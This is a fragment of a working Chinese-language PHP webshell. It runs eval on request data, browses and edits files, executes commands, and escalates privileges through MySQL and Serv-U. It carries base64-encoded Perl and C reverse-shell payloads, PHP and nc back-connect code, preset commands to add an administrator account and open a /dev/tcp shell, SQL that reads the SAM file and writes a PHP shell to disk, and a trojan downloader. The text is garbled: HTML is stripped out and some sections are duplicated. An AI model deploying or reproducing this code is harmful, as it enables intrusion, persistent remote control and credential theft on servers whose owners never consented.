ob_start(); define('myaddress',$_SERVER['SCRIPT_FILENAME']); define('postpass',$password); define('shellname',$shellname); define('myurl',$myurl); if(@get_magic_quotes_gpc()){ foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v); foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v); } if(isset($_REQUEST[postpass])){ hmlogin(2); @eval($_REQUEST[postpass]); exit;} if($_COOKIE['postpass'] != md5(postpass)){ if($_POST['postpass']){ if($_POST['postpass'] == postpass){ setcookie('postpass',md5($_POST['postpass'])); hmlogin(); }else{ echo '
用户或密码错误
'; } } islogin($shellname,$myurl); exit; } if(isset($_GET['down'])) do_down($_GET['down']); if(isset($_GET['pack'])){ $dir = do_show($_GET['pack']); $zip = new eanver($dir); $out = $zip->out; do_download($out,$_SERVER['HTTP_HOST'].".tar.gz"); } if(isset($_GET['unzip'])){ css_main(); start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']); exit; } define('root_dir',str_replace('\\','/',dirname(myaddress)).'/'); define('run_win',substr(PHP_OS, 0, 3) == "WIN"); define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME'])); $eanver = isset($_GET['eanver']) ? $_GET['eanver'] : ""; $doing = isset($_POST['doing']) ? $_POST['doing'] : ""; $path = isset($_GET['path']) ? $_GET['path'] : root_dir; $name = isset($_POST['name']) ? $_POST['name'] : ""; $img = isset($_GET['img']) ? $_GET['img'] : ""; $p = isset($_GET['p']) ? $_GET['p'] : ""; $pp = urlencode(dirname($p)); if($img) css_img($img); if($eanver == "phpinfo") die(phpinfo()); if($eanver == 'logout'){ setcookie('postpass',null); die(''); } $class = array( "信息操作" => array("upfiles" => "上传文件","phpinfo" => "基本信息","info_f" => "系统信息","phpcode" => "执行PHP脚本"), "提权工具" => array("sqlshell" => "执行SQL执行","mysql_exec" => "MYSQL操作","myexp" => "MYSQL提权","servu" => "Serv-U提权","cmd" => "执行命令","linux" => "反弹提权","downloader" => "文件下载","port" => "端口扫描"), "批量操作" => array("guama" => "批量挂马清马","tihuan" => "批量替换内容","scanfile" => "批量搜索文件","scanphp" => "批量查找木马"), "脚本插件" => array("getcode" => "在线代理") ); $msg = array("0" => "保存成功","1" => "保存失败","2" => "上传成功","3" => "上传失败","4" => "修改成功","5" => "修改失败","6" => "删除成功","7" => "删除失败"); css_main(); switch($eanver){ case "left": css_left(); html_n("
"); html_img("title");html_n(" 本地硬盘
"); $i = 2; foreach($class as $name => $array){ html_n("
"); html_img("title");html_n(" $name
"); $i++; } html_n("
"); html_img("title");html_n(" 其它操作
"); html_n(""); break; case "main": css_js("1"); $dir = @dir($path); $REAL_DIR = File_Str(realpath($path)); if(!empty($_POST['actall'])){echo '
'.File_Act($_POST['files'],$_POST['actall'],$_POST['inver'],$REAL_DIR).'
';} $NUM_D = $NUM_F = 0; if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/'; $ROOT_DIR = File_Mode(); html_n("
地址:"); html_n("
"); html_n("
"); html_n(" "); html_input("file","upfilet","","      "); html_input("submit","uploadt","上传"); if(!empty($_POST['newfile'])){ if(isset($_POST['bin'])) $bin = $_POST['bin']; else $bin = "wb"; $newfile=base64_decode($_POST['newfile']); if(strtolower($_POST['charset'])=='utf-8'){$txt=base64_decode($_POST['txt']);}else{$txt=$_POST['txt'];} if (substr(PHP_VERSION,0,1)>=5){if((strtolower($_POST['charset'])=='gb2312') or (strtolower($_POST['charset'])=='gbk')){$txt=iconv("UTF-8","gb2312//IGNORE" ,base64_decode($_POST['txt']));}else{$txt = array_iconv($txt);}} echo do_write($newfile,$bin,$txt) ? '
'.$newfile.' '.$msg[0] : '
'.$newfile.' '.$msg[1]; @touch($newfile,@strtotime($_POST['time'])); } html_n('
'); html_n(''); html_n(''); while($dirs = @$dir->read()){ if($dirs == '.' or $dirs == '..') continue; $dirpath = str_path("$path/$dirs"); if(is_dir($dirpath)){ $perm = substr(base_convert(fileperms($dirpath),10,8),-4); $filetime = @date('Y-m-d H:i:s',@filemtime($dirpath)); $dirpath = urlencode($dirpath); html_n(''); $NUM_D++; } } @$dir->rewind(); while($files = @$dir->read()){ if($files == '.' or $files == '..') continue; $filepath = str_path("$path/$files"); if(!is_dir($filepath)){ $fsize = @filesize($filepath); $fsize = File_Size($fsize); $perm = substr(base_convert(fileperms($filepath),10,8),-4); $filetime = @date('Y-m-d H:i:s',@filemtime($filepath)); $Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$filepath); $todir=$ROOT_DIR.'/zipfile'; $filepath = urlencode($filepath); $it=substr($filepath,-3); html_n(''); $NUM_F++; } } @$dir->close(); if(!$Filetime) $Filetime = gmdate('Y-m-d H:i:s',time() + 3600 * 8); print<<
目录({$NUM_D}) / 文件({$NUM_F})
END; break; case "editr": print<< END; html_base(); print<< END; css_js("2"); if(!empty($_POST['uploadt'])){ echo @copy($_FILES['upfilet']['tmp_name'],str_path($p.'/'.$_FILES['upfilet']['name'])) ? html_a("?eanver=main",$_FILES['upfilet']['name'].' '.$msg[2]) : msg($msg[3]); die(''); } if(!empty($_GET['redir'])){ $name=$_GET['name']; $newdir = str_path($p.'/'.$name); @mkdir($newdir,0777) ? html_a("?eanver=main",$name.' '.$msg[0]) : msg($msg[1]); die(''); } if(!empty($_GET['refile'])){ $name=$_GET['name']; $jspath=urlencode($p.'/'.$name); $pp = urlencode($p); $p = str_path($p.'/'.$name); $FILE_CODE = ""; $charset= 'GB2312'; $FILE_TIME =date('Y-m-d H:i:s',time()+3600*8); if(@file_exists($p)) echo '发现目录下有"同名"文件
'; }else{ $jspath=urlencode($p); $FILE_TIME = date('Y-m-d H:i:s',filemtime($p)); $FILE_CODE=@file_get_contents($p); if (substr(PHP_VERSION,0,1)>=5){ if(empty($_GET['charset'])){ if(TestUtf8($FILE_CODE)>1){$charset= 'UTF-8';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{$charset= 'GB2312';} }else{ if($_GET['charset']=='GB2312'){$charset= 'GB2312';}else{$charset= $_GET['charset'];$FILE_CODE = iconv($_GET['charset'],"gb2312//IGNORE",$FILE_CODE);} } } $FILE_CODE = htmlspecialchars($FILE_CODE); } print<<查找内容:
指定编码: END; html_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\""); print<<
文件修改时间 以二进制形式保存文件(建议使用)
END; break; case "rename": html_n("
"); break; case "info_f": $dis_func = get_cfg_var("disable_functions"); $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传"; $adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from").""; if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","
",$dis_func);$dis_func = str_replace(",","
",$dis_func);} $phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; $info = array( array("服务器时间",date("Y年m月d日 h:i:s",time())), array("服务器域名","".$_SERVER['SERVER_NAME'].""), array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])), array("服务器操作系统",PHP_OS), array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']), array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']), array("你的IP",$_SERVER["REMOTE_ADDR"]), array("Web服务端口",$_SERVER['SERVER_PORT']), array("PHP运行方式",strtoupper(php_sapi_name())), array("PHP版本",PHP_VERSION), array("运行于安全模式",Info_Cfg("safemode")), array("服务器管理员",$adminmail), array("本文件路径",myaddress), array("允许使用 URL 打开文件 allow_url_fopen",Info_Cfg("allow_url_fopen")), array("允许使用curl_exec",Info_Fun("curl_exec")), array("允许动态加载链接库 enable_dl",Info_Cfg("enable_dl")), array("显示错误信息 display_errors",Info_Cfg("display_errors")), array("自动定义全局变量 register_globals",Info_Cfg("register_globals")), array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")), array("程序最多允许使用内存量 memory_limit",Info_Cfg("memory_limit")), array("POST最大字节数 post_max_size",Info_Cfg("post_max_size")), array("允许最大上传文件 upload_max_filesize",$upsize), array("程序最长运行时间 max_execution_time",Info_Cfg("max_execution_time")."秒"), array("被禁用的函数 disable_functions",$dis_func), array("phpinfo()",$phpinfo), array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'), array("图形处理 GD Library",Info_Fun("imageline")), array("IMAP电子邮件系统",Info_Fun("imap_close")), array("MySQL数据库",Info_Fun("mysql_close")), array("SyBase数据库",Info_Fun("sybase_close")), array("Oracle数据库",Info_Fun("ora_close")), array("Oracle 8 数据库",Info_Fun("OCILogOff")), array("PREL相容语法 PCRE",Info_Fun("preg_match")), array("PDF文档支持",Info_Fun("pdf_close")), array("Postgre SQL数据库",Info_Fun("pg_close")), array("SNMP网络管理协议",Info_Fun("snmpget")), array("压缩文件支持(Zlib)",Info_Fun("gzclose")), array("XML解析",Info_Fun("xml_set_object")), array("FTP",Info_Fun("ftp_login")), array("ODBC数据库连接",Info_Fun("odbc_close")), array("Session支持",Info_Fun("session_start")), array("Socket支持",Info_Fun("fsockopen")), ); $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host"); echo '
'); html_a('?eanver=main&path='.uppath($path),'上级目录'); html_n('操作文件属性('.get_current_user().')用户|组修改时间文件大小
'); html_img("dir"); html_a('?eanver=main&path='.$dirpath,$dirs); html_n(''); html_n("改名"); html_n("删除 "); html_a('?pack='.$dirpath,'打包'); html_n(''); html_a('?eanver=perm&p='.$dirpath.'&chmod='.$perm,$perm); html_n(''.GetFileOwner("$path/$dirs").':'.GetFileGroup("$path/$dirs")); html_n(''.$filetime.''); html_n('
'); html_img(css_showimg($files)); html_a($Fileurls,$files,'target="_blank"'); html_n(''); if(($it=='.gz') or ($it=='zip') or ($it=='tar') or ($it=='.7z')) html_a('?unzip='.$filepath,'解压','title="解压'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');return false;"'); else html_a('?eanver=editr&p='.$filepath,'编辑','title="编辑'.$files.'"'); html_n("改名"); html_n("删除 "); html_n("复制"); html_n(''); html_a('?eanver=perm&p='.$filepath.'&chmod='.$perm,$perm); html_n(''.GetFileOwner("$path/$files").':'.GetFileGroup("$path/$files")); html_n(''.$filetime.''); html_a('?down='.$filepath,$fsize,'title="下载'.$files.'"'); html_n('
"); $newname = urldecode($pp).'/'.urlencode($_GET['newname']); @rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET['newname']).' '.$msg[4]) : msg($msg[5]); die(''); break; case "deltree": html_n("
"); do_deltree($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]); die(''); break; case "del": html_n("
"); @unlink($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]); die(''); break; case "copy": html_n("
"); $newpath = explode('/',$_GET['newcopy']); $pathr[0] = $newpath[0]; for($i=1;$i < count($newpath);$i++){ $pathr[] = urlencode($newpath[$i]); } $newcopy = implode('/',$pathr); @copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.' '.$msg[4]) : msg($msg[5]); die(''); break; case "perm": html_n("
".$p.' 属性为: '); if(is_dir($p)){ html_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET['chmod']); }else{ html_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET['chmod']); } html_input("submit","save","修改"); back(); if($_POST['class']){ switch($_POST['class']){ case "0777": $change = @chmod($p,0777); break; case "0755": $change = @chmod($p,0755); break; case "0555": $change = @chmod($p,0555); break; case "0666": $change = @chmod($p,0666); break; case "0644": $change = @chmod($p,0644); break; case "0444": $change = @chmod($p,0444); break; } $change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]); die(''); } html_n("
'; for($i = 0;$i < count($info);$i++){echo ''."\n";} try{$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\PortNumber"); $Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort"); $PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort"); }catch(Exception $e){} echo ''."\n"; echo ''."\n"; echo ''."\n"; echo '
'.$info[$i][0].''.$info[$i][1].'
Terminal Service端口为'.$registry_proxystring.'
Telnet端口为'.$Telnet.'
PcAnywhere端口为'.$PcAnywhere.'
'; break; case "cmd": $res = '回显窗口'; $cmd = 'dir'; if(!empty($_POST['cmd'])){$res = Exec_Run(base64_decode($_POST['cmd']));$cmd = htmlspecialchars(base64_decode($_POST['cmd']));} print<< function sFull(i){ Str = new Array(11); Str[0] = "dir"; Str[1] = "net user envl envl /add"; Str[2] = "net localgroup administrators envl /add"; Str[3] = "netstat -ano"; Str[4] = "ipconfig"; Str[5] = "copy c:\\1.php d:\\2.php"; Str[6] = "tftp -i {$_SERVER["REMOTE_ADDR"]} get server.exe c:\\server.exe"; Str[7] = "0<&123;exec 123<>/dev/tcp/{$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123"; Str[8] = "tasklist -svc"; document.getElementById('cmd').value = Str[i]; return true; } END; html_base(); print<<
执行命令新增很多隐藏函数,这个执行不了,除了反弹出来,绝对没有任何工具能执行命令!外加使用BASE64加密提交,防止被拦(小细节,大成就)
命令参数
END; break; case "linux": $yourip = $_COOKIE['yourip'] ? $_COOKIE['yourip'] : getenv('REMOTE_ADDR'); $yourport = $_COOKIE['yourport'] ? $_COOKIE['yourport'] : '12388'; $system=strtoupper(substr(PHP_OS, 0, 3)); print<<使用方法:
先在自己电脑运行"nc -vv -l 12388"
然后在此填写你电脑的IP,点连接!此反弹很全很实用!包括NC反弹!
你的地址
连接端口
执行方式
END; if((!empty($_POST['yourip'])) && (!empty($_POST['yourport']))) { setcookie('yourip',$backip); setcookie('yourport',$backport); echo '
'; if($_POST['use'] == 'perl') { $back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; echo File_Write('/tmp/envl_bc',base64_decode($back_connect_pl),'wb') ? '创建/tmp/envl_bc成功
' : '创建/tmp/envl_bc失败
'; $perlpath = Exec_Run('which perl'); $perlpath = $perlpath ? chop($perlpath) : 'perl'; @unlink('/tmp/envl_bc.c'); echo Exec_Run($perlpath.' /tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '执行命令失败'; } if($_POST['use'] == 'c') { $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; echo File_Write('/tmp/envl_bc.c',base64_decode($back_connect_c),'wb') ? '创建/tmp/envl_bc.c成功
' : '创建/tmp/envl_bc.c失败
'; $res = Exec_Run('gcc -o /tmp/envl_bc /tmp/envl_bc.c'); @unlink('/tmp/envl_bc.c'); echo Exec_Run('/tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '执行命令失败'; } if($_POST['use'] == 'php') { if(!extension_loaded('sockets')) { if ($system == 'WIN') { @dl('php_sockets.dll') or die("Can't load socket"); }else{ @dl('sockets.so') or die("Can't load socket"); } } if($system=="WIN") { $env=array('path' => 'c:\\windows\\system32'); }else{ $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'); } $descriptorspec = array( 0 => array("pipe","r"), 1 => array("pipe","w"), 2 => array("pipe","w"), ); $host = $_POST['yourip']; $port = $_POST['yourport']; $host=gethostbyname($host); $proto=getprotobyname("tcp"); if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){ die("Socket创建失败"); } if(($ret=socket_connect($sock,$host,$port))<0){ die("连接失败"); }else{ $message="----------------------PHP反弹连接--------------------\n"; socket_write($sock,$message,strlen($message)); $cwd=str_replace('\\','/',dirname(__FILE__)); while($cmd=socket_read($sock,65535,$proto)){ if(trim(strtolower($cmd))=="exit"){ socket_write($sock,"Bye\n"); exit; }else{ $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env); if (is_resource($process)) { fwrite($pipes[0], $cmd); fclose($pipes[0]); $msg=stream_get_contents($pipes[1]); socket_write($sock,$msg,strlen($msg)); fclose($pipes[1]); $msg=stream_get_contents($pipes[2]); socket_write($sock,$msg,strlen($msg)); $return_value = proc_close($process); } } } } } if($_POST['use'] == 'nc') { echo '
'; $mip=$_POST['yourip']; $bport=$_POST['yourport']; $fp=fsockopen($mip , $bport , $errno, $errstr); if (!$fp){ $result = "Error: could not open socket connection"; }else { fputs ($fp ,"\n*********************************************\n hacking url:http://www.google.com is ok! \n*********************************************\n\n"); while(!feof($fp)){ fputs ($fp," [r00t@H4c3ing:/root]# "); $result= fgets ($fp, 4096); $message=`$result`; fputs ($fp,"--> ".$message."\n"); } fclose ($fp); } echo '
'; } echo '
你可以尝试连接端口 (nc -vv -l '.$_POST['yourport'].') '; } break; case "sqlshell": $MSG_BOX = ''; $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();'; if(isset($_POST['mhost']) && isset($_POST['muser'])) { $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata); else $MSG_BOX = '连接MYSQL失败'; } $downfile = 'c:/windows/repair/sam'; if(!empty($_POST['downfile'])) { $downfile = File_Str($_POST['downfile']); $binpath = bin2hex($downfile); $query = 'select load_file(0x'.$binpath.')'; if($result = @mysql_query($query,$conn)) { $k = 0; $downcode = ''; while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;} $filedown = basename($downfile); if(!$filedown) $filedown = 'envl.tmp'; $array = explode('.', $filedown); $arrayend = array_pop($array); header('Content-type: application/x-'.$arrayend); header('Content-Disposition: attachment; filename='.$filedown); header('Content-Length: '.strlen($downcode)); echo $downcode; exit; } else $MSG_BOX = '下载文件失败'; } $o = isset($_GET['o']) ? $_GET['o'] : ''; print<< function nFull(i){ Str = new Array(11); Str[0] = "select version();"; Str[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'"; Str[2] = "select '' into outfile 'F:/web/bak.php';"; Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;"; nform.msql.value = Str[i]; return true; } END; html_base(); print<<
地址 端口 用户 密码 库名
END; if($o == 'u') { $uppath = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/exp.vbs'; if(!empty($_POST['uppath'])) { $uppath = $_POST['uppath']; $query = 'Create TABLE a (cmd text NOT NULL);'; if(@mysql_query($query,$conn)) { if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));} else{$tmp = File_Str(dirname(myaddress)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}} $query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));'; if(@mysql_query($query,$conn)) { $query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';'; $MSG_BOX = @mysql_query($query,$conn) ? '上传文件成功' : '上传文件失败'; } else $MSG_BOX = '插入临时表失败'; @mysql_query('Drop TABLE IF EXISTS a;',$conn); } else $MSG_BOX = '创建临时表失败'; } print<<
上传路径

选择文件
END; } elseif($o == 'd') { print<<

下载文件
END; } else { if(!empty($_POST['msql'])) { $msql = $_POST['msql']; $msql = base64_decode($msql); if($result = @mysql_query($msql,$conn)) { $MSG_BOX = '执行SQL语句成功
'; $k = 0; while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;} } else $MSG_BOX .= mysql_error(); } print<<{$msql}
END; } if($MSG_BOX != '') echo '
'.$MSG_BOX.'
'; else echo '
'; break; case "downloader": $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe'; $Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe'); print<<
超连接
下载到
END; if((!empty($_POST['durl'])) && (!empty($_POST['dpath']))) { echo '
'; $contents = @file_get_contents($_POST['durl']); if(!$contents) echo '无法读取要下载的数据'; else echo File_Write($_POST['dpath'],$contents,'wb') ? '下载文件成功' : '下载文件失败'; echo '
'; } break; case "issql": session_start(); if($_POST['sqluser'] && $_POST['sqlpass']){ $_SESSION['sql_user'] = $_POST['sqluser']; $_SESSION['sql_password'] = $_POST['sqlpass']; } if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];} else{$_SESSION['sql_host'] = 'localhost';} if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];} else{$_SESSION['sql_port'] = '3306';} if($_SESSION['sql_user'] && $_SESSION['sql_password']){ if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){ unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']); die(html_a('?eanver=sqlshell','连接失败请返回')); } } else{ die(html_a('?eanver=sqlshell','连接失败请返回')); } $query = mysql_query("SHOW DATABASES",$sqlcon); html_n('数据库列表:'); while($db = mysql_fetch_array($query)) { html_a('?eanver=issql&db='.$db['Database'],$db['Database']); echo '  '; } html_n(''); if($_GET['db']){ css_js("3"); mysql_select_db($_GET['db'], $sqlcon); html_n('

'); html_select(array(0=>"--SQL语法--",7=>"添加数据",8=>"删除数据",9=>"修改数据",10=>"建数据表",11=>"删数据表",12=>"添加字段",13=>"删除字段"),0,"onchange='return Full(options[selectedIndex].value)'"); html_input("submit","doquery","执行"); html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']); html_n('--->'); html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']); html_n('

'); if(!empty($_POST['sql'])){ if (@mysql_query($_POST['sql'],$sqlcon)) { echo "执行SQL语句成功"; }else{ echo "出错: ".mysql_error(); } } if($_GET['table']){ html_n(''); $query = "SHOW COLUMNS FROM ".$_GET['table']; $result = mysql_query($query,$sqlcon); $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields,$row['Field']); html_n(''); } html_n(''); $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error()); while($text = @mysql_fetch_assoc($result)){ foreach($fields as $row){ if($text[$row] == "") $text[$row] = 'NULL'; html_n(''); } echo ''; } } else{ $query = "SHOW TABLES FROM " . $_GET['db']; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)){ html_n(""); } } } break; case "downloader": $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe'; $Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe'); print<<
超连接
下载到
END; if((!empty($_POST['durl'])) && (!empty($_POST['dpath']))) { echo '
'; $contents = @file_get_contents($_POST['durl']); if(!$contents) echo '无法读取要下载的数据'; else echo File_Write($_POST['dpath'],$contents,'wb') ? '下载文件成功' : '下载文件失败'; echo '
'; } break; case "issql": session_start(); if($_POST['sqluser'] && $_POST['sqlpass']){ $_SESSION['sql_user'] = $_POST['sqluser']; $_SESSION['sql_password'] = $_POST['sqlpass']; } if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];} else{$_SESSION['sql_host'] = 'localhost';} if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];} else{$_SESSION['sql_port'] = '3306';} if($_SESSION['sql_user'] && $_SESSION['sql_password']){ if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){ unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']); die(html_a('?eanver=sqlshell','连接失败请返回')); } } else{ die(html_a('?eanver=sqlshell','连接失败请返回')); } $query = mysql_query("SHOW DATABASES",$sqlcon); html_n('
'); if($_GET['db']){ css_js("3"); mysql_select_db($_GET['db'], $sqlcon); html_n('
'.$row['Field'].'
'.$text[$row].'
".$row[0]."
数据库列表:'); while($db = mysql_fetch_array($query)) { html_a('?eanver=issql&db='.$db['Database'],$db['Database']); echo '  '; } html_n('

'); html_select(array(0=>"--SQL语法--",7=>"添加数据",8=>"删除数据",9=>"修改数据",10=>"建数据表",11=>"删数据表",12=>"添加字段",13=>"删除字段"),0,"onchange='return Full(options[selectedIndex].value)'"); html_input("submit","doquery","执行"); html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']); html_n('--->'); html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']); html_n('

'); if(!empty($_POST['sql'])){ if (@mysql_query($_POST['sql'],$sqlcon)) { echo "执行SQL语句成功"; }else{ echo "出错: ".mysql_error(); } } if($_GET['table']){ html_n(''); $query = "SHOW COLUMNS FROM ".$_GET['table']; $result = mysql_query($query,$sqlcon); $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields,$row['Field']); html_n(''); } html_n(''); $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error()); while($text = @mysql_fetch_assoc($result)){ foreach($fields as $row){ if($text[$row] == "") $text[$row] = 'NULL'; html_n(''); } echo ''; } } else{ $query = "SHOW TABLES FROM " . $_GET['db']; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)){ html_n(""); } } } break; case "upfiles": html_n(''); if(!empty($_POST['path'])){ html_n(''); if(!empty($_POST['path'])){ html_n(''); if(!empty($_POST['path'])){ html_n(''); if(!empty($_POST['path'])){ html_n('
'.$row['Field'].'
'.$text[$row].'
".$row[0]."
服务器限制上传单个文件大小: '.@get_cfg_var('upload_max_filesize').'
'); html_input("text","uppath",root_dir,"
